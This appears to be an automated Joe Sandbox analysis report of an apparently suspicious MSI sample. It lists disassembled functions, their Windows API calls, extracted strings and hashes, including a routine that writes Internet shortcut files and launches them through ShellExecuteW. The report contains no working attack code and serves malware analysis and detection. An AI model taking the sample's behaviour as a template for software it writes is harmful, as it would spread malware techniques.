                                                                    • Instruction ID: d0d756c3f9687bc86b6d25c36353e39acd71102fe907439426c3b01378d1e65b
                                                                    • Opcode Fuzzy Hash: 47398b504f268ddfd47b1332cbc19df07ffa87418bf3a7d3219e7420ec3f8f4e
                                                                    • Instruction Fuzzy Hash: 1E91C232C01A088ADB12CF68D8413AFB775AF46320F158397DC557B292F73989C9C75A
                                                                    Function 00453B75 Relevance: .2, Instructions: 162COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce90631ccd48a786f0dbaec49c2f70008bc2b08315126eb600449cdff332ad58
                                                                    • Instruction ID: 78b2f13ed4ee14b7dd1a9ee4954333d132515523544b4ba46ef45f6a6497a889
                                                                    • Opcode Fuzzy Hash: ce90631ccd48a786f0dbaec49c2f70008bc2b08315126eb600449cdff332ad58
                                                                    • Instruction Fuzzy Hash: C451A571E00109EFDF05CF99C8516AEBBB2EF88345F14C09AE815AB342D734AE55DB94
                                                                    Function 0044B570 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: 8166b68b90934ebd670585bac23f552cdf3143466791ed865e08af1fb764cbd2
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: E5112B7720004153F605C63ED8B45BBE396EFC6329B2E437BD0428B758D33AD955A688
                                                                    Function 004289D0 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 347filememoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00428A4D
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00428AA0
                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428AAF
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00428ACB
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428BAB
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428BB7
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428BF3
                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428C11
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428C2E
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428CC3
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00428D08
                                                                    • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00428D5A
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428D8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                    • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                    • API String ID: 2199533872-3004881174
                                                                    • Opcode ID: be02983214c2ed6196f348453d9d371e0e1e52acf839c62031437fbd6a6f6863
                                                                    • Instruction ID: 1578952836a7f67d755d63c8143e670d6b72754fd19d72b756a666a70a117d31
                                                                    • Opcode Fuzzy Hash: be02983214c2ed6196f348453d9d371e0e1e52acf839c62031437fbd6a6f6863
                                                                    • Instruction Fuzzy Hash: 7DC134B1A012559FEB209F24DC45BEFBBB5EF51300F54416EE5409B3C2EB784909C7A9
                                                                    Function 0043EB07 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 438COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043EB0E
                                                                    • numpunct.LIBCPMT ref: 0043EEF3
                                                                      • Part of subcall function 0043B266: __EH_prolog3.LIBCMT ref: 0043B26D
                                                                      • Part of subcall function 0043B06C: __EH_prolog3.LIBCMT ref: 0043B073
                                                                      • Part of subcall function 0043B06C: std::_Lockit::_Lockit.LIBCPMT ref: 0043B07D
                                                                      • Part of subcall function 0043B06C: std::_Lockit::~_Lockit.LIBCPMT ref: 0043B0EE
                                                                      • Part of subcall function 0042EA80: std::_Lockit::_Lockit.LIBCPMT ref: 0042EAAD
                                                                      • Part of subcall function 0042EA80: std::_Lockit::_Lockit.LIBCPMT ref: 0042EAD0
                                                                      • Part of subcall function 0042EA80: std::_Lockit::~_Lockit.LIBCPMT ref: 0042EAF8
                                                                      • Part of subcall function 0042EA80: std::_Lockit::~_Lockit.LIBCPMT ref: 0042EBA1
                                                                      • Part of subcall function 004349F5: Concurrency::cancel_current_task.LIBCPMT ref: 00434AB8
                                                                      • Part of subcall function 0043A55D: __EH_prolog3.LIBCMT ref: 0043A564
                                                                      • Part of subcall function 0043A55D: std::_Lockit::_Lockit.LIBCPMT ref: 0043A56E
                                                                      • Part of subcall function 0043A55D: std::_Lockit::~_Lockit.LIBCPMT ref: 0043A5DF
                                                                    • __Getcoll.LIBCPMT ref: 0043ECC3
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                      • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
                                                                      • Part of subcall function 0042BCF0: __Getctype.LIBCPMT ref: 0042BCFB
                                                                      • Part of subcall function 0043A970: __EH_prolog3.LIBCMT ref: 0043A977
                                                                      • Part of subcall function 0043A970: std::_Lockit::_Lockit.LIBCPMT ref: 0043A981
                                                                      • Part of subcall function 0043AA9A: __EH_prolog3.LIBCMT ref: 0043AAA1
                                                                      • Part of subcall function 0043AA9A: std::_Lockit::_Lockit.LIBCPMT ref: 0043AAAB
                                                                      • Part of subcall function 0043ACEE: __EH_prolog3.LIBCMT ref: 0043ACF5
                                                                      • Part of subcall function 0043ACEE: std::_Lockit::_Lockit.LIBCPMT ref: 0043ACFF
                                                                      • Part of subcall function 0043ACEE: std::_Lockit::~_Lockit.LIBCPMT ref: 0043AD70
                                                                      • Part of subcall function 0043AC59: __EH_prolog3.LIBCMT ref: 0043AC60
                                                                      • Part of subcall function 0043AC59: std::_Lockit::_Lockit.LIBCPMT ref: 0043AC6A
                                                                      • Part of subcall function 0043AC59: std::_Lockit::~_Lockit.LIBCPMT ref: 0043ACDB
                                                                      • Part of subcall function 004349F5: __EH_prolog3.LIBCMT ref: 004349FC
                                                                      • Part of subcall function 004349F5: std::_Lockit::_Lockit.LIBCPMT ref: 00434A06
                                                                      • Part of subcall function 004349F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00434AAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_$H_prolog3$Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalnumpunct
                                                                    • String ID: 9H$@:H$D:H$H:H$L:H$P:H$T:H$X:H$\:H
                                                                    • API String ID: 1748785662-2847461705
                                                                    • Opcode ID: b41cc058ac5072f2da06080f210bd5c16d77c4ed8f8bcbdc3f50d8bd5a86916f
                                                                    • Instruction ID: 9d309a5004b45d103efe660042825b124b4fe978b52977e1e3579d668b381ad0
                                                                    • Opcode Fuzzy Hash: b41cc058ac5072f2da06080f210bd5c16d77c4ed8f8bcbdc3f50d8bd5a86916f
                                                                    • Instruction Fuzzy Hash: DFD10671D02225AADB11AFB78C026BF7AA4DF89760F10951FF845572C2DB7C890087AD
                                                                    Function 0043E635 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 438COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043E63C
                                                                    • numpunct.LIBCPMT ref: 0043EA21
                                                                      • Part of subcall function 0043B233: __EH_prolog3.LIBCMT ref: 0043B23A
                                                                      • Part of subcall function 0043AFD7: __EH_prolog3.LIBCMT ref: 0043AFDE
                                                                      • Part of subcall function 0043AFD7: std::_Lockit::_Lockit.LIBCPMT ref: 0043AFE8
                                                                      • Part of subcall function 0043AFD7: std::_Lockit::~_Lockit.LIBCPMT ref: 0043B059
                                                                      • Part of subcall function 0043B101: __EH_prolog3.LIBCMT ref: 0043B108
                                                                      • Part of subcall function 0043B101: std::_Lockit::_Lockit.LIBCPMT ref: 0043B112
                                                                      • Part of subcall function 0043B101: std::_Lockit::~_Lockit.LIBCPMT ref: 0043B183
                                                                      • Part of subcall function 004349F5: Concurrency::cancel_current_task.LIBCPMT ref: 00434AB8
                                                                      • Part of subcall function 0043A4C8: __EH_prolog3.LIBCMT ref: 0043A4CF
                                                                      • Part of subcall function 0043A4C8: std::_Lockit::_Lockit.LIBCPMT ref: 0043A4D9
                                                                      • Part of subcall function 0043A4C8: std::_Lockit::~_Lockit.LIBCPMT ref: 0043A54A
                                                                    • __Getcoll.LIBCPMT ref: 0043E7F1
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                      • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
                                                                      • Part of subcall function 0043E13A: __Getctype.LIBCPMT ref: 0043E149
                                                                      • Part of subcall function 0043A8DB: __EH_prolog3.LIBCMT ref: 0043A8E2
                                                                      • Part of subcall function 0043A8DB: std::_Lockit::_Lockit.LIBCPMT ref: 0043A8EC
                                                                      • Part of subcall function 0043AA05: __EH_prolog3.LIBCMT ref: 0043AA0C
                                                                      • Part of subcall function 0043AA05: std::_Lockit::_Lockit.LIBCPMT ref: 0043AA16
                                                                      • Part of subcall function 0043ABC4: __EH_prolog3.LIBCMT ref: 0043ABCB
                                                                      • Part of subcall function 0043ABC4: std::_Lockit::_Lockit.LIBCPMT ref: 0043ABD5
                                                                      • Part of subcall function 0043ABC4: std::_Lockit::~_Lockit.LIBCPMT ref: 0043AC46
                                                                      • Part of subcall function 0043AB2F: __EH_prolog3.LIBCMT ref: 0043AB36
                                                                      • Part of subcall function 0043AB2F: std::_Lockit::_Lockit.LIBCPMT ref: 0043AB40
                                                                      • Part of subcall function 004349F5: __EH_prolog3.LIBCMT ref: 004349FC
                                                                      • Part of subcall function 004349F5: std::_Lockit::_Lockit.LIBCPMT ref: 00434A06
                                                                      • Part of subcall function 004349F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00434AAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$H_prolog3$Lockit::_$Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalnumpunct
                                                                    • String ID: `:H$d:H$h:H$l:H$p:H$t:H$x:H$|:H
                                                                    • API String ID: 3146296281-1933110371
                                                                    • Opcode ID: ddf874df5d736db24937b0fd701510e880a51c64f3fbac6494def0b28573cce9
                                                                    • Instruction ID: 927ff400353fc23f7c6a2211406ca7ea53cda45c348ce4b6945239bf8789f3bd
                                                                    • Opcode Fuzzy Hash: ddf874df5d736db24937b0fd701510e880a51c64f3fbac6494def0b28573cce9
                                                                    • Instruction Fuzzy Hash: 44D109B1D012159ADB14AFB78C0267F7AA4DF99364F10951FF845A72C2EB7C890087EE
                                                                    Function 0043E630 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __Getcoll.LIBCPMT ref: 0043E7F1
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                      • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
                                                                      • Part of subcall function 0043E13A: __Getctype.LIBCPMT ref: 0043E149
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$AllocGetcollGetctypeLocalLockit::_Lockit::~_
                                                                    • String ID: `:H$d:H$h:H$l:H$p:H$t:H$x:H$|:H
                                                                    • API String ID: 462355747-1933110371
                                                                    • Opcode ID: f3c4af3832dbd3fa791ae0097a4c5b550d8b70d8bb4bb0c03b5d2f68f15557f2
                                                                    • Instruction ID: 42f4c78e92e73811160de7f85b2674d047532fc46ab6dc779383f653e10bc7d6
                                                                    • Opcode Fuzzy Hash: f3c4af3832dbd3fa791ae0097a4c5b550d8b70d8bb4bb0c03b5d2f68f15557f2
                                                                    • Instruction Fuzzy Hash: 43C12871D023159BDB14AFA78C027AF7AA5EF88364F20951FE945673C2DB7C8900879E
                                                                    Function 0042F4E0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 263memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000018,F3E52339,00000000,?), ref: 0042F546
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042F580
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042F5E4
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042F77B
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042F82F
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0042F857
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                    • String ID: bad locale name$false$true
                                                                    • API String ID: 975656625-1062449267
                                                                    • Opcode ID: c79629d7fbc289beb79856748002cc861c1d800ebf8a1feea898439d2eaafd17
                                                                    • Instruction ID: 2ed545c2fd4a9d64bf0482c02ed483a3e4cdfe257dcd2d033c061ac01c7755aa
                                                                    • Opcode Fuzzy Hash: c79629d7fbc289beb79856748002cc861c1d800ebf8a1feea898439d2eaafd17
                                                                    • Instruction Fuzzy Hash: 4DB1C1B0D00348DEEB10DFA5C945BDEBBF4BF04308F14816EE558AB282E7799A48CB55
                                                                    Function 00426B50 Relevance: 15.1, APIs: 10, Instructions: 132timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,F3E52339,?,00000000), ref: 00426BA5
                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,F3E52339,?,00000000), ref: 00426BC6
                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F3E52339,?,00000000), ref: 00426BF9
                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F3E52339,?,00000000), ref: 00426C0A
                                                                    • CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426C28
                                                                    • CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426C4C
                                                                    • CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426C78
                                                                    • CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426C98
                                                                    • CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426CBA
                                                                    • CloseHandle.KERNEL32(00000000,?,F3E52339,?,00000000), ref: 00426CDA
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process$OpenTimes
                                                                    • String ID:
                                                                    • API String ID: 1711917922-0
                                                                    • Opcode ID: a1a38903f567201ef8089dd28dc481aadd6475f0c8088b4b34cbe7433f77c501
                                                                    • Instruction ID: 7c740683c98e2bbb0aa0b3ace1662fd4c9f172f08b1ec0f2133ea3fbfbc405b5
                                                                    • Opcode Fuzzy Hash: a1a38903f567201ef8089dd28dc481aadd6475f0c8088b4b34cbe7433f77c501
                                                                    • Instruction Fuzzy Hash: AC5170B0E01218DBDB14DF95E9487EEBBB4EF05714F20812AE655B7380E7B919048B6D
                                                                    Function 00425A00 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 373fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempFileNameW.KERNEL32(?,URL,00000000,?,F3E52339,?,00000004), ref: 00425A6A
                                                                    • LocalFree.KERNEL32(?), ref: 00425B7B
                                                                    • MoveFileW.KERNEL32(?,00000000), ref: 00425E1B
                                                                    • DeleteFileW.KERNEL32(?), ref: 00425E63
                                                                    • LocalFree.KERNEL32(?), ref: 00425EFD
                                                                    • LocalFree.KERNEL32(?), ref: 00425FB2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: FileFreeLocal$DeleteMoveNameTemp
                                                                    • String ID: URL$url
                                                                    • API String ID: 1227976696-346267919
                                                                    • Opcode ID: e2b3049dbd996668e82250c5dec95296d85e106f8f65c2bc0186dc50a7960ecf
                                                                    • Instruction ID: 66b9d27d7b3735f27aebde2f0967a70903e7a17effb2160f93747ed35ae1f182
                                                                    • Opcode Fuzzy Hash: e2b3049dbd996668e82250c5dec95296d85e106f8f65c2bc0186dc50a7960ecf
                                                                    • Instruction Fuzzy Hash: 55027870E146299ADB24DF24D998B9DB7B0FF54304F5042DAE409A7291EB78AFC4CF84
                                                                    Function 00447630 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00447637
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C86D
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C890
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C8B8
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 1383202999-2891247106
                                                                    • Opcode ID: c33188f14cd0c96948b77993b9e8e2fd7bd8b94bbc99b8cb93d369c1d41d77e5
                                                                    • Instruction ID: a9875291ce45ec1aa16935fc7fdc427faca8657e73f5b8ec901a25fd97463f77
                                                                    • Opcode Fuzzy Hash: c33188f14cd0c96948b77993b9e8e2fd7bd8b94bbc99b8cb93d369c1d41d77e5
                                                                    • Instruction Fuzzy Hash: 7AC172B250410AABFF18DF58C959DFB7BBCEB08304F14411BFA06A6251D7389A12CB69
                                                                    Function 00441AC0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00441AC7
                                                                      • Part of subcall function 0043A71C: __EH_prolog3.LIBCMT ref: 0043A723
                                                                      • Part of subcall function 0043A71C: std::_Lockit::_Lockit.LIBCPMT ref: 0043A72D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3$LockitLockit::_std::_
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 2181796688-2891247106
                                                                    • Opcode ID: 1348e3c43549a86dadaf045b913c6d2f5b038fdb8fc0345cf24e71f0dd921e64
                                                                    • Instruction ID: 069e5e2681d2b9378c5b0fab20ef4f3d02b290752420727be77fc81481724f79
                                                                    • Opcode Fuzzy Hash: 1348e3c43549a86dadaf045b913c6d2f5b038fdb8fc0345cf24e71f0dd921e64
                                                                    • Instruction Fuzzy Hash: 00C1A5B6940109ABEB14DF98CD95DFB3BB8EF09304F14411BFA46E3261D638DA50CB69
                                                                    Function 00441EC0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00441EC7
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B81D
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B840
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B868
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B911
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
